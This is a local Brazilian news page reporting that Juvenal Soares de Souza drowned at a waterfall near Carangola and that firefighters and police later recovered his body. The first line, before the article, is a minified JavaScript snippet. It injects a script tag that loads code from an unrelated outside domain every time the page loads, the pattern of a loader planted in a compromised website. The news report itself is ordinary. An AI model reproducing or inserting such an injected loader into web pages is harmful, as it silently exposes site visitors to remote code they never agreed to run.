;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Encontrado o corpo de Juvenal Soares de Souza que se afogou no Rio Carangola. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Encontrado o corpo de Juvenal Soares de Souza que se afogou no Rio Carangola.

Na tarde dessa segunda Feira(07), feriado em Carangola e de folga de seu trabalho, Juvenal Soares de Souza(39a) foi tomar um banho de cachoeira com sua companheira. Escolheu um lugar bem reservado próximo a Carangola. Na cabeceira da Cachoeira do Vazito.
Segundo a sua companheira informou à PMMG: Ao atravessar um  ponto de onde estavam ele escorregou e afundou. Tendo emergido 3 vezes. Não sendo mais visto seu corpo.
Não foi possível localizar o seu corpo nessa segunda feira e nessa terça feira pela manhã o Grupamento do Corpo de Bombeiros de Muriaé. Composto do 2º Sgto Milani, do 2º Sgto Franco, do CB Saulo e do Sd Marco Aurélio. Juntamente com os membros da 75ª Cia de PMMG de Carangola Cb Cláudio e Sd Lozi. Juntamente com os familiares da vítima chegaram ao local do acontecimento.
Tão logo chegaram já encontraram o corpo boiando em uma pequena piscina natural formada na cabeceira da cachoeira. O local foi preservado e a perícia foi chamada para identificar a causa mortis.
Após a realização da perícia o corpo será levado para Pedra Dourada, sua Terra Natal, onde será velado e sepultado.
Juvenal morava há bem pouco tempo em Carangola na Avenida Machado de Assis. Porém era bem conhecido, pois trabalhava no Açougue da Filial dos Supermercados Marinho. Seus colegas de trabalho e gerência da rede, colocaram no local, onde o mesmo trabalhava, uma mensagem de luto pela perda do companheiro e amigo.


Ofertas clique aqui


[vitrine]cameras[/vitrine]

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.